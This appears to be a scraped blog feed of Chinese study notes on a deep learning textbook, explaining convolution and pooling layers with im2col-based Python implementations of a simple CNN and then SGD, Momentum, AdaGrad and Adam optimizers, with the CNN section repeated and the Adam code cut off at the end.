1.5.2 GPUs (CuPy)

CuPy is a library for parallel computation on GPUs. To use CuPy you need a machine with an NVIDIA GPU, plus an installation of CUDA, NVIDIA's general-purpose parallel computing platform for GPUs.
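
CuPy deliberately mirrors the NumPy API, so np code often ports by swapping the module. A minimal sketch, assuming a working CuPy and CUDA installation:

import cupy as cp

x_gpu = cp.arange(6).reshape(2, 3).astype('f')  # array allocated in GPU memory
s = x_gpu.sum(axis=1)                           # reduction runs on the GPU
print(cp.asnumpy(s))                            # copy back to the host: [ 3. 12.]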

1.6 Summary

• A neural network has an input layer, hidden layers, and an output layer

• Fully connected layers perform linear transformations; activation functions perform nonlinear ones

• Both fully connected layers and mini-batch processing can be written as matrix computations

• Error backpropagation efficiently computes the gradients of a neural network's loss

• Computational graphs visualize the processing inside a neural network and help in understanding forward and backward propagation

• Modularizing the components of a neural network as layers simplifies the implementation

• The bit precision of the data and GPU parallel computing matter greatly for speeding up neural networks

Deep Learning from Scratch: Theory and Implementation in Python (7): Convolutional Neural Networks

7.2 The Convolution Layer

7.2.1 Problems with Fully Connected Layers

The problem with fully connected layers: the shape of the data is "ignored". For example, 3-dimensional image data must be flattened into a 1-dimensional vector, discarding its spatial structure.

A convolutional neural network can keep the shape intact.

The input data of a convolution layer is called the input feature map, and its output data the output feature map.

7.2.2 The Convolution Operation

[Figure: an example of the convolution operation]

The processing a convolution layer performs is the convolution operation, which corresponds to the "filter operation" in image processing.

At each position, multiply the elements of the filter by the corresponding elements of the input and sum the products (this is sometimes called a multiply-accumulate operation), then store the result at the corresponding position of the output. Doing this at every position yields the output of the convolution.
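
To make the multiply-accumulate concrete, here is a minimal NumPy sketch of a stride-1, no-padding 2D convolution (the helper name conv2d and the example values are mine):

import numpy as np

def conv2d(x, w):
    # Slide the filter over every position; multiply elementwise, then sum.
    H, W = x.shape
    FH, FW = w.shape
    out = np.empty((H - FH + 1, W - FW + 1))
    for i in range(out.shape[0]):
        for j in range(out.shape[1]):
            out[i, j] = np.sum(x[i:i+FH, j:j+FW] * w)
    return out

x = np.array([[1., 2., 3., 0.],
              [0., 1., 2., 3.],
              [3., 0., 1., 2.],
              [2., 3., 0., 1.]])
w = np.array([[2., 0., 1.],
              [0., 1., 2.],
              [1., 0., 2.]])
print(conv2d(x, w))
# [[15. 16.]
#  [ 6. 15.]]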

7.2.3 Padding

[Figure: a convolution with padding applied around the input]

Filling fixed values (for example zeros) around the input data before the convolution layer processes it is called padding.
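
For instance, a padding of 1 can be sketched with np.pad, which grows each side of the array:

import numpy as np

x = np.arange(9).reshape(3, 3)
x_pad = np.pad(x, pad_width=1, mode='constant', constant_values=0)
print(x_pad.shape)  # (5, 5): one extra row/column of zeros on every side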

7.2.4 Stride

[Figure: a convolution applied with a stride greater than 1]

The interval between the positions at which the filter is applied is called the stride.

Let the input size be $(H,W)$, the filter size $(FH, FW)$, the output size $(OH,OW)$, the padding $P$, and the stride $S$. Then

$$OH=\frac{H+2P-FH}{S}+1,\qquad OW=\frac{W+2P-FW}{S}+1$$
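
As a quick sanity check of the formula (a sketch of my own, not from the book):

def conv_output_size(size, filter_size, pad=0, stride=1):
    # (H + 2P - FH) // S + 1, applied per spatial dimension
    return (size + 2 * pad - filter_size) // stride + 1

print(conv_output_size(7, 5))                   # 3  (7x7 input, 5x5 filter)
print(conv_output_size(7, 3, pad=1, stride=2))  # 4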

7.2.5 Convolution on 3-Dimensional Data

[Figure: a convolution over 3-dimensional data, summed across channels]

7.2.6 Thinking in Blocks

Treating the data and the filters as rectangular blocks (cuboids) makes the convolution over 3-dimensional data much easier to picture.

[Figure: the 3-dimensional convolution drawn with blocks]

7.2.7 Batch Processing

The data flowing between layers is 4-dimensional, and the convolution is performed on all N pieces of data together. In other words, batch processing bundles N separate passes into a single one.

7.3 The Pooling Layer

[Figure: an example of max pooling]

Pooling is an operation that shrinks the spatial extent (height and width).

In image recognition, max pooling is the most common choice.

Properties of the pooling layer:

• No parameters to learn

  • Unlike a convolution layer, a pooling layer has nothing to learn: it only takes the maximum (or the average) of the target region, so there are no parameters.

• The number of channels does not change

  • The pooling operation leaves the channel count of the input unchanged in the output.

• Robust to small positional shifts

  • When the input shifts slightly, pooling can still return the same result, so it is robust to small perturbations of the input.
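
A minimal sketch of 2x2 max pooling with stride 2 on a single 4x4 channel (my own layout trick, not the book's implementation, which follows in 7.4.4):

import numpy as np

x = np.array([[1, 2, 0, 1],
              [0, 3, 2, 4],
              [5, 0, 1, 0],
              [2, 1, 0, 2]])

# Group the array into non-overlapping 2x2 windows, then take each window's max
out = x.reshape(2, 2, 2, 2).max(axis=(1, 3))
print(out)
# [[3 4]
#  [5 2]]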

7.4 Implementing the Convolution and Pooling Layers

7.4.1 4-Dimensional Arrays

By 4-dimensional data we mean, for example, data of shape (10, 1, 28, 28): 10 pieces of data, each with 1 channel, height 28, and width 28.

import numpy as np

x = np.random.rand(10, 1, 28, 28)
x.shape  # (10, 1, 28, 28)

Accessing the first piece of data:

x[0].shape  # (1, 28, 28)

Accessing the spatial data of the first channel of the first piece:

x[0, 0]  # or x[0][0]

7.4.2 Expansion with im2col

Implementing the convolution naively would mean nesting several levels of for loops. That is tedious, and NumPy has the drawback that processing slows down when you use for loops (in NumPy it is best to avoid for loops for element access).

im2col is a function that expands the input data so that it fits the filters (weights). Applying im2col to the 3-dimensional input turns it into a 2-dimensional matrix (strictly speaking, the 4-dimensional data including the batch dimension is converted into 2-dimensional data).

[Figure: im2col expands each filter application area into one row of a matrix]

The name im2col is short for "image to column", that is, converting an image into columns (of a matrix).

7.4.3 Implementing the Convolution Layer

im2col(input_data, filter_h, filter_w, stride=1, pad=0)

• input_data: the input, a 4-dimensional array of (batch size, channels, height, width)

• filter_h: filter height

• filter_w: filter width

• stride: stride

• pad: padding

import sys, os
sys.path.append(os.pardir)
import numpy as np
from common.util import im2col

x1 = np.random.rand(1, 3, 7, 7)
col1 = im2col(x1, 5, 5, stride=1, pad=0)
print(col1.shape)  # (9, 75)

x2 = np.random.rand(10, 3, 7, 7)  # 10 pieces of data
col2 = im2col(x2, 5, 5, stride=1, pad=0)
print(col2.shape)  # (90, 75)

(9, 75)
(90, 75)

A 7x7 input with a 5x5 filter has 3x3 = 9 application positions, each holding 3 x 5 x 5 = 75 elements, hence (9, 75); with a batch of 10 the row count becomes 10 x 9 = 90.

Implementing the convolution layer with im2col:

class Convolution:
    def __init__(self, W, b, stride=1, pad=0):
        """
        Receives the filters (weights), bias, stride, and padding.
        The filters form a 4-dimensional array of shape (FN, C, FH, FW),
        where FN, C, FH and FW stand for Filter Number, Channel,
        Filter Height and Filter Width.
        """
        self.W = W
        self.b = b
        self.stride = stride
        self.pad = pad

    def forward(self, x):
        FN, C, FH, FW = self.W.shape
        N, C, H, W = x.shape
        out_h = int(1 + (H + 2*self.pad - FH) / self.stride)
        out_w = int(1 + (W + 2*self.pad - FW) / self.stride)
        col = im2col(x, FH, FW, self.stride, self.pad)
        col_W = self.W.reshape(FN, -1).T  # expand the filters into columns
        out = np.dot(col, col_W) + self.b
        out = out.reshape(N, out_h, out_w, -1).transpose(0, 3, 1, 2)  # back to (N, C, H, W)
        return out
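
A quick shape check of the layer (random data, my own example): 30 filters of shape (3, 5, 5) applied to ten 3-channel 7x7 inputs give ten 30-channel 3x3 outputs.

W = np.random.randn(30, 3, 5, 5)
b = np.zeros(30)
conv = Convolution(W, b, stride=1, pad=0)

x = np.random.rand(10, 3, 7, 7)
print(conv.forward(x).shape)  # (10, 30, 3, 3)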

7.4.4 Implementing the Pooling Layer

[Figure: the pooling areas are expanded row by row, channel by channel]

The pooling application areas are expanded separately for each channel.

class Pooling:
    def __init__(self, pool_h, pool_w, stride=1, pad=0):
        self.pool_h = pool_h
        self.pool_w = pool_w
        self.stride = stride
        self.pad = pad

    def forward(self, x):
        N, C, H, W = x.shape
        out_h = int(1 + (H - self.pool_h) / self.stride)
        out_w = int(1 + (W - self.pool_w) / self.stride)
        # Expand the input (1)
        col = im2col(x, self.pool_h, self.pool_w, self.stride, self.pad)
        col = col.reshape(-1, self.pool_h*self.pool_w)
        # Maximum of each row (2)
        out = np.max(col, axis=1)
        # Reshape to the output size (3)
        out = out.reshape(N, out_h, out_w, C).transpose(0, 3, 1, 2)
        return out

The pooling layer is implemented in three stages (see the shape check after this list):

• Expand the input data.

• Take the maximum of each row.

• Reshape to the appropriate output size.
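
The shape check (my own example): pooling preserves the channel count and here halves the spatial size.

pool = Pooling(pool_h=2, pool_w=2, stride=2)

x = np.random.rand(10, 3, 28, 28)
print(pool.forward(x).shape)  # (10, 3, 14, 14)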

7.5 Implementing a CNN

import pickle
from collections import OrderedDict
import numpy as np
from common.layers import *  # Convolution, Pooling, Affine, Relu, SoftmaxWithLoss
from common.gradient import numerical_gradient


class SimpleConvNet:
    """A simple ConvNet:

    conv - relu - pool - affine - relu - affine - softmax

    Parameters
    ----------
    input_dim : dimensions of the input data (channels, height, width); (1, 28, 28) for MNIST
    conv_param : hyperparameters of the convolution layer (filter_num, filter_size, pad, stride)
    hidden_size : number of neurons in the hidden fully connected layer (e.g. 100)
    output_size : output size (10 for MNIST)
    weight_init_std : standard deviation of the weights (e.g. 0.01)
    """
    def __init__(self, input_dim=(1, 28, 28),
                 conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},
                 hidden_size=100, output_size=10, weight_init_std=0.01):
        filter_num = conv_param['filter_num']
        filter_size = conv_param['filter_size']
        filter_pad = conv_param['pad']
        filter_stride = conv_param['stride']
        input_size = input_dim[1]
        conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1
        pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))

        # Initialize the weights
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(filter_num, input_dim[0], filter_size, filter_size)
        self.params['b1'] = np.zeros(filter_num)
        self.params['W2'] = weight_init_std * np.random.randn(pool_output_size, hidden_size)
        self.params['b2'] = np.zeros(hidden_size)
        self.params['W3'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b3'] = np.zeros(output_size)

        # Create the layers
        self.layers = OrderedDict()
        self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],
                                           conv_param['stride'], conv_param['pad'])
        self.layers['Relu1'] = Relu()
        self.layers['Pool1'] = Pooling(pool_h=2, pool_w=2, stride=2)
        self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])
        self.layers['Relu2'] = Relu()
        self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])

        self.last_layer = SoftmaxWithLoss()

    def predict(self, x):
        for layer in self.layers.values():
            x = layer.forward(x)
        return x

    def loss(self, x, t):
        """Compute the loss.
        x is the input data, t the teacher labels.
        """
        y = self.predict(x)
        return self.last_layer.forward(y, t)

    def accuracy(self, x, t, batch_size=100):
        if t.ndim != 1:
            t = np.argmax(t, axis=1)

        acc = 0.0
        for i in range(int(x.shape[0] / batch_size)):
            tx = x[i*batch_size:(i+1)*batch_size]
            tt = t[i*batch_size:(i+1)*batch_size]
            y = self.predict(tx)
            y = np.argmax(y, axis=1)
            acc += np.sum(y == tt)

        return acc / x.shape[0]

    def numerical_gradient(self, x, t):
        """Compute the gradients by numerical differentiation.

        Parameters
        ----------
        x : input data
        t : teacher labels

        Returns
        -------
        A dictionary holding the gradients of each layer:
        grads['W1'], grads['W2'], ... are the weights of each layer,
        grads['b1'], grads['b2'], ... are the biases of each layer.
        """
        loss_w = lambda w: self.loss(x, t)

        grads = {}
        for idx in (1, 2, 3):
            grads['W' + str(idx)] = numerical_gradient(loss_w, self.params['W' + str(idx)])
            grads['b' + str(idx)] = numerical_gradient(loss_w, self.params['b' + str(idx)])

        return grads

    def gradient(self, x, t):
        """Compute the gradients by error backpropagation.

        Parameters
        ----------
        x : input data
        t : teacher labels

        Returns
        -------
        A dictionary holding the gradients of each layer:
        grads['W1'], grads['W2'], ... are the weights of each layer,
        grads['b1'], grads['b2'], ... are the biases of each layer.
        """
        # forward
        self.loss(x, t)

        # backward
        dout = 1
        dout = self.last_layer.backward(dout)

        layers = list(self.layers.values())
        layers.reverse()
        for layer in layers:
            dout = layer.backward(dout)

        # Collect the gradients
        grads = {}
        grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db
        grads['W2'], grads['b2'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
        grads['W3'], grads['b3'] = self.layers['Affine2'].dW, self.layers['Affine2'].db

        return grads

    def save_params(self, file_name="params.pkl"):
        params = {}
        for key, val in self.params.items():
            params[key] = val
        with open(file_name, 'wb') as f:
            pickle.dump(params, f)

    def load_params(self, file_name="params.pkl"):
        with open(file_name, 'rb') as f:
            params = pickle.load(f)
        for key, val in params.items():
            self.params[key] = val

        for i, key in enumerate(['Conv1', 'Affine1', 'Affine2']):
            self.layers[key].W = self.params['W' + str(i+1)]
            self.layers[key].b = self.params['b' + str(i+1)]

    如果使用 MNIST 数据集训练 SimpleConvNet,则训练数据的识别率为 99.82%,测试数据的识别率为 98.96%(每次学习的识别精度都会发生一些误差)。测试数据的识别率大约为 99%,就小型网络来说,这是一个非常高的识别率。

    7.7 具有代表性的 CNN

7.7.1 LeNet

LeNet 于 1998 年首次被提出,是最早的 CNN 之一。

7.7.2 AlexNet

AlexNet 于 2012 年被提出,是引发深度学习热潮的导火线。

    • 激活函数使用 ReLU

    • 使用进行局部正规化的 LRN(Local Response Normalization)层

    • 使用 Dropout

    7.8 小结

    • CNN 在此前的全连接层的网络中新增了卷积层和池化层。

    • 使用 im2col 函数可以简单、高效地实现卷积层和池化层。

    • 通过 CNN 的可视化,可知随着层次变深,提取的信息愈加高级。

    • LeNet 和 AlexNet 是 CNN 的代表性网络。

    • 在深度学习的发展中,大数据和 GPU 做出了很大的贡献。

    ]]>
    + 正文


    7.2 卷积层

    7.2.1 全连接层存在的问题

    全连接层存在的问题:数据的形状被“忽视”。

    卷积神经网络可以保持形状不变。

    卷积层的输入数据称为输入特征图(input feature map)

    输出数据称为输出特征图(output feature map)

    7.2.2 卷积运算


    卷积层进行的处理就是卷积运算。卷积运算相当于图像处理中的“滤波器运算”。

    将各个位置上滤波器的元素和输入的对应元素相乘,然后再求和(有时将这个计算称为乘积累加运算)。然后,将这个结果保存到输出的对应位置。将这个过程在所有位置都进行一遍,就可以得到卷积运算的输出。
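下面用一段示意性的 Python 代码直观地表示这个乘积累加运算(仅单通道、无填充、步幅为 1,非书中实现):

import numpy as np

def conv2d_naive(x, w):
    """对单通道输入 x 应用滤波器 w 的乘积累加运算(示意)"""
    H, W = x.shape
    FH, FW = w.shape
    OH, OW = H - FH + 1, W - FW + 1
    out = np.zeros((OH, OW))
    for i in range(OH):
        for j in range(OW):
            # 对应元素相乘后求和,保存到输出的对应位置
            out[i, j] = np.sum(x[i:i+FH, j:j+FW] * w)
    return out

x = np.arange(16, dtype=float).reshape(4, 4)
w = np.ones((3, 3))
print(conv2d_naive(x, w).shape)  # (2, 2)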

    7.2.3 填充


    在卷积层的处理之前,向输入数据的周围填入固定的数据,称为填充(padding)

    7.2.4 步幅


    应用滤波器的位置间隔称为步幅(stride)

    假设输入大小为 $(H,W)$,滤波器大小为 $(FH, FW)$,输出大小为 $(OH,OW)$,填充为 $P$,步幅为 $S$。

$$OH=\frac{H+2P-FH}{S}+1,\quad OW=\frac{W+2P-FW}{S}+1$$
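可以用一个小函数验证这个公式(示意,取 MNIST 常见的设定):

def conv_output_size(input_size, filter_size, pad=0, stride=1):
    # 对应上式:(H + 2P - FH) / S + 1
    return (input_size + 2*pad - filter_size) // stride + 1

print(conv_output_size(28, 5, pad=0, stride=1))  # 24
print(conv_output_size(28, 5, pad=2, stride=1))  # 28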

    7.2.5 3 维数据的卷积运算


    7.2.6 结合方块思考

    将数据和滤波器结合长方体的方块来考虑,3 维数据的卷积运算会很容易理解。


    7.2.7 批处理

    网络间传递的是 4 维数据,对这 N 个数据进行了卷积运算。也就是说,批处理将 N 次的处理汇总成了 1 次进行。

    7.3 池化层


    池化是缩小高、长方向上的空间的运算。

    在图像识别领域,主要使用 Max 池化。

    池化层的特征

    • 没有要学习的参数

      • 池化层和卷积层不同,没有要学习的参数。池化只是从目标区域中取最大值(或者平均值),所以不存在要学习的参数。
    • 通道数不发生变化

      • 经过池化运算,输入数据和输出数据的通道数不会发生变化。
    • 对微小的位置变化具有鲁棒性(健壮)

      • 输入数据发生微小偏差时,池化仍会返回相同的结果。因此,池化对输入数据的微小偏差具有鲁棒性。

    7.4 卷积层和池化层的实现

    7.4.1 4 维数组

所谓 4 维数据,比如形状为 (10, 1, 28, 28) 的数据,对应 10 个高为 28、长为 28、通道数为 1 的数据。

    x = np.random.rand(10, 1, 28, 28)
    x.shape
    (10, 1, 28, 28)

    访问第 1 个数据:

    x[0].shape
    (1, 28, 28)

    访问第 1 个数据的第 1 个通道的空间数据:

    x[0, 0]  # 或 x[0][0]

    7.4.2 基于 im2col 的展开

如果老老实实地实现卷积运算,估计要重复好几层的 for 语句。这样的实现有点麻烦,而且 NumPy 中存在使用 for 语句后处理变慢的缺点(在 NumPy 中,访问元素时最好不要用 for 语句)。

im2col 是一个函数,将输入数据展开以适合滤波器(权重)。对 3 维的输入数据应用 im2col 后,数据转换为 2 维矩阵(正确地讲,是把包含批数量的 4 维数据转换成了 2 维数据)。


    im2col 这个名称是“image to column”的缩写,翻译过来就是“从图像到矩阵”的意思。

    7.4.3 卷积层的实现

    im2col(input_data, filter_h, filter_w, stride=1, pad=0)

    • input_data―由(数据量,通道,高,长)的 4 维数组构成的输入数据

    • filter_h―滤波器的高

    • filter_w―滤波器的长

    • stride―步幅

    • pad―填充
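common.util 中的 im2col 用到了 NumPy 的切片技巧,这里先给出一个接口一致、但只为说明原理的朴素实现(示意,效率远低于正式版本):

import numpy as np

def im2col_naive(x, filter_h, filter_w, stride=1, pad=0):
    N, C, H, W = x.shape
    out_h = (H + 2*pad - filter_h) // stride + 1
    out_w = (W + 2*pad - filter_w) // stride + 1
    img = np.pad(x, [(0, 0), (0, 0), (pad, pad), (pad, pad)], 'constant')
    col = np.zeros((N, out_h * out_w, C * filter_h * filter_w))
    for n in range(N):
        idx = 0
        for i in range(0, out_h * stride, stride):
            for j in range(0, out_w * stride, stride):
                # 把每个滤波器窗口展开成一行
                col[n, idx] = img[n, :, i:i+filter_h, j:j+filter_w].ravel()
                idx += 1
    return col.reshape(N * out_h * out_w, -1)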

    import sys, os
    sys.path.append(os.pardir)
    from common.util import im2col

    x1 = np.random.rand(1, 3, 7, 7)
    col1 = im2col(x1, 5, 5, stride=1, pad=0)
    print(col1.shape) # (9, 75)

    x2 = np.random.rand(10, 3, 7, 7) # 10 个数据
    col2 = im2col(x2, 5, 5, stride=1, pad=0)
    print(col2.shape) # (90, 75)
(9, 75)
(90, 75)

    使用 im2col 来实现卷积层:

class Convolution:
    def __init__(self, W, b, stride=1, pad=0):
        """
        将滤波器(权重)、偏置、步幅、填充作为参数接收。
        滤波器是 (FN, C, FH, FW) 的 4 维形状。
        FN、C、FH、FW 分别是 Filter Number(滤波器数量)、Channel、Filter Height、Filter Width 的缩写。
        """
        self.W = W
        self.b = b
        self.stride = stride
        self.pad = pad

    def forward(self, x):
        FN, C, FH, FW = self.W.shape
        N, C, H, W = x.shape
        out_h = int(1 + (H + 2*self.pad - FH) / self.stride)
        out_w = int(1 + (W + 2*self.pad - FW) / self.stride)

        col = im2col(x, FH, FW, self.stride, self.pad)
        col_W = self.W.reshape(FN, -1).T  # 滤波器的展开
        out = np.dot(col, col_W) + self.b

        out = out.reshape(N, out_h, out_w, -1).transpose(0, 3, 1, 2)  # 修改轴顺序
        return out

    7.4.4 池化层的实现


    池化的应用区域按通道单独展开。

class Pooling:
    def __init__(self, pool_h, pool_w, stride=1, pad=0):
        self.pool_h = pool_h
        self.pool_w = pool_w
        self.stride = stride
        self.pad = pad

    def forward(self, x):
        N, C, H, W = x.shape
        out_h = int(1 + (H - self.pool_h) / self.stride)
        out_w = int(1 + (W - self.pool_w) / self.stride)

        # 展开(1)
        col = im2col(x, self.pool_h, self.pool_w, self.stride, self.pad)
        col = col.reshape(-1, self.pool_h*self.pool_w)

        # 最大值(2)
        out = np.max(col, axis=1)

        # 转换(3)
        out = out.reshape(N, out_h, out_w, C).transpose(0, 3, 1, 2)
        return out

    池化层的实现按下面 3 个阶段:

    • 展开输入数据。

    • 求各行的最大值。

• 转换为合适的输出大小。

    7.5 CNN 的实现

class SimpleConvNet:
    """简单的 ConvNet

    conv - relu - pool - affine - relu - affine - softmax

    Parameters
    ----------
    input_dim : 输入数据的维度(通道、高、长),MNIST 的情况下为 (1, 28, 28)
    conv_param : 卷积层的超参数字典,包含 filter_num、filter_size、pad、stride
    hidden_size : 隐藏层(全连接)的神经元数量
    output_size : 输出大小(MNIST 的情况下为 10)
    weight_init_std : 指定权重的标准差(e.g. 0.01)
    """
    def __init__(self, input_dim=(1, 28, 28),
                 conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},
                 hidden_size=100, output_size=10, weight_init_std=0.01):
        filter_num = conv_param['filter_num']
        filter_size = conv_param['filter_size']
        filter_pad = conv_param['pad']
        filter_stride = conv_param['stride']
        input_size = input_dim[1]
        conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1
        pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))

        # 初始化权重
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(filter_num, input_dim[0], filter_size, filter_size)
        self.params['b1'] = np.zeros(filter_num)
        self.params['W2'] = weight_init_std * np.random.randn(pool_output_size, hidden_size)
        self.params['b2'] = np.zeros(hidden_size)
        self.params['W3'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b3'] = np.zeros(output_size)

        # 生成层
        self.layers = OrderedDict()
        self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],
                                           conv_param['stride'], conv_param['pad'])
        self.layers['Relu1'] = Relu()
        self.layers['Pool1'] = Pooling(pool_h=2, pool_w=2, stride=2)
        self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])
        self.layers['Relu2'] = Relu()
        self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])

        self.last_layer = SoftmaxWithLoss()

    def predict(self, x):
        for layer in self.layers.values():
            x = layer.forward(x)
        return x

    def loss(self, x, t):
        """
        求损失函数的值
        参数 x 是输入数据,t 是教师标签
        """
        y = self.predict(x)
        return self.last_layer.forward(y, t)

    def accuracy(self, x, t, batch_size=100):
        if t.ndim != 1:
            t = np.argmax(t, axis=1)

        acc = 0.0
        for i in range(int(x.shape[0] / batch_size)):
            tx = x[i*batch_size:(i+1)*batch_size]
            tt = t[i*batch_size:(i+1)*batch_size]
            y = self.predict(tx)
            y = np.argmax(y, axis=1)
            acc += np.sum(y == tt)

        return acc / x.shape[0]

    def numerical_gradient(self, x, t):
        """求梯度(数值微分)

        Parameters
        ----------
        x : 输入数据
        t : 教师标签

        Returns
        -------
        具有各层的梯度的字典变量
        grads['W1']、grads['W2']、...是各层的权重
        grads['b1']、grads['b2']、...是各层的偏置
        """
        loss_w = lambda w: self.loss(x, t)

        grads = {}
        for idx in (1, 2, 3):
            grads['W' + str(idx)] = numerical_gradient(loss_w, self.params['W' + str(idx)])
            grads['b' + str(idx)] = numerical_gradient(loss_w, self.params['b' + str(idx)])

        return grads

    def gradient(self, x, t):
        """求梯度(误差反向传播法)

        Parameters
        ----------
        x : 输入数据
        t : 教师标签

        Returns
        -------
        具有各层的梯度的字典变量
        grads['W1']、grads['W2']、...是各层的权重
        grads['b1']、grads['b2']、...是各层的偏置
        """
        # forward
        self.loss(x, t)

        # backward
        dout = 1
        dout = self.last_layer.backward(dout)

        layers = list(self.layers.values())
        layers.reverse()
        for layer in layers:
            dout = layer.backward(dout)

        # 设定
        grads = {}
        grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db
        grads['W2'], grads['b2'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
        grads['W3'], grads['b3'] = self.layers['Affine2'].dW, self.layers['Affine2'].db

        return grads

    def save_params(self, file_name="params.pkl"):
        params = {}
        for key, val in self.params.items():
            params[key] = val
        with open(file_name, 'wb') as f:
            pickle.dump(params, f)

    def load_params(self, file_name="params.pkl"):
        with open(file_name, 'rb') as f:
            params = pickle.load(f)
        for key, val in params.items():
            self.params[key] = val

        for i, key in enumerate(['Conv1', 'Affine1', 'Affine2']):
            self.layers[key].W = self.params['W' + str(i+1)]
            self.layers[key].b = self.params['b' + str(i+1)]

    如果使用 MNIST 数据集训练 SimpleConvNet,则训练数据的识别率为 99.82%,测试数据的识别率为 98.96%(每次学习的识别精度都会发生一些误差)。测试数据的识别率大约为 99%,就小型网络来说,这是一个非常高的识别率。

    7.7 具有代表性的 CNN

7.7.1 LeNet

LeNet 于 1998 年首次被提出,是最早的 CNN 之一。

7.7.2 AlexNet

AlexNet 于 2012 年被提出,是引发深度学习热潮的导火线。

    • 激活函数使用 ReLU

    • 使用进行局部正规化的 LRN(Local Response Normalization)层

    • 使用 Dropout

    7.8 小结

    • CNN 在此前的全连接层的网络中新增了卷积层和池化层。

    • 使用 im2col 函数可以简单、高效地实现卷积层和池化层。

    • 通过 CNN 的可视化,可知随着层次变深,提取的信息愈加高级。

    • LeNet 和 AlexNet 是 CNN 的代表性网络。

    • 在深度学习的发展中,大数据和 GPU 做出了很大的贡献。

    ]]>
    @@ -8117,7 +8117,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-6-%E4%B8%8E%E5%AD%A6%E4%B9%A0%E7%9B%B8%E5%85%B3%E7%9A%84%E6%8A%80%E5%B7%A7/ - 正文

    6.1 参数的更新

    6.1.2 SGD

    $$\mathbf W\leftarrow \mathbf W -\eta\frac{\partial L}{\partial \mathbf W}$$

    class SGD:
    def __init__(self, lr=0.01):
    self.lr = lr

    def update(self, params, grads):
    for key in params.keys():
    params[key] -= self.lr * grads[key]

    6.1.3 SGD 的缺点


    如果函数的形状非均向(anisotropic),比如呈延伸状,搜索的路径就会非常低效。因此,我们需要比单纯朝梯度方向前进的 SGD 更聪明的方法。SGD 低效的根本原因是,梯度的方向并没有指向最小值的方向(指向极小值的方向)。

    6.1.4 Momentum


    $$v\leftarrow \alpha v -\eta\frac{\partial L}{\partial \mathbf W}$$

    $$\mathbf W \leftarrow \mathbf W + v$$

    • Momentum 方法给人的感觉就像是小球在地面上滚动。

    • 新出现了一个变量 $v$,对应物理上的速度。

    • $\alpha v$ 这一项。在物体不受任何力时,该项承担使物体逐渐减速的任务($\alpha$ 设定为 0.9 之类的值),对应物理上的地面摩擦或空气阻力。

    class Momentum:
    def __init__(self, lr=0.01, momentum=0.9):
    self.lr = lr
    self.momentum = momentum
    self.v = None


    def update(self, params, grads):
    if self.v is None:
    self.v = {}
    for key, val in params.items():
    self.v[key] = np.zeros_like(val)

    for key in params.keys():
    self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
    params[key] += self.v[key]

    6.1.5 AdaGrad

    在神经网络的学习中,学习率(数学式中记为 $\eta$)的值很重要。

    • 学习率过小,会导致学习花费过多时间;

    • 学习率过大,则会导致学习发散而不能正确进行。

    在关于学习率的有效技巧中,有一种被称为**学习率衰减(learning rate decay)**的方法,即随着学习的进行,使学习率逐渐减小。实际上,一开始“多”学,然后逐渐“少”学的方法,在神经网络的学习中经常被使用。

    $$\mathbf h\leftarrow \mathbf h + \frac{\partial L}{\partial \mathbf W} \odot \frac{\partial L}{\partial \mathbf W}$$

    $$\mathbf W\leftarrow \mathbf W - \eta\frac{1}{\sqrt{\mathbf h}}\frac{\partial L}{\partial \mathbf W}$$

    和前面的 SGD 一样,$\mathbf W$ 表示要更新的权重参数,$\frac{\partial L}{\partial \mathbf W}$表示损失函数关于 $\mathbf W$ 的梯度,$\eta$ 表示学习率。这里新出现了变量 $\mathbf h$,保存了以前的所有梯度值的平方和($\odot$ 表示对应矩阵元素的乘法)。然后,在更新参数时,通过乘以 $\frac{1}{\sqrt{\mathbf h}}$,就可以调整学习的尺度。

    AdaGrad 会记录过去所有梯度的平方和。因此,学习越深入,更新的幅度就越小。实际上,如果无止境地学习,更新量就会变为 0,完全不再更新。为了改善这个问题,可以使用 RMSProp 方法。RMSProp 方法并不是将过去所有的梯度一视同仁地相加,而是逐渐地遗忘过去的梯度,在做加法运算时将新梯度的信息更多地反映出来。这种操作从专业上讲,称为“指数移动平均”,呈指数函数式地减小过去的梯度的尺度。

    class AdaGrad:
    def __init__(self, lr=0.01):
    self.lr = lr
    self.h = None


    def update(self, params, grads):
    if self.h is None:
    self.h = {}
    for key, val in params.items():
    self.h[key] = np.zeros_like(val)

    for key in params.keys():
    self.h[key] += grads[key] * grads[key]
    params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)

    6.1.6 Adam

    Adam 是 2015 年提出的新方法。它的理论有些复杂,直观地讲,就是融合了 Momentum 和 AdaGrad 的方法。通过组合前面两个方法的优点,有望实现参数空间的高效搜索。此外,进行超参数的“偏置校正”也是 Adam 的特征。

    Adam 会设置 3 个超参数。一个是学习率(论文中以 $\alpha$ 出现),另外两个是一次 momentum 系数 $\beta_1$ 和二次 momentum 系数 $\beta_2$。根据论文,标准的设定值是 $\beta_1$ 为 0.9,$\beta_2$ 为 0.999。设置了这些值后,大多数情况下都能顺利运行。

    class Adam:
    """Adam (http://arxiv.org/abs/1412.6980v8)"""
    def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
    self.lr = lr
    self.beta1 = beta1
    self.beta2 = beta2
    self.iter = 0
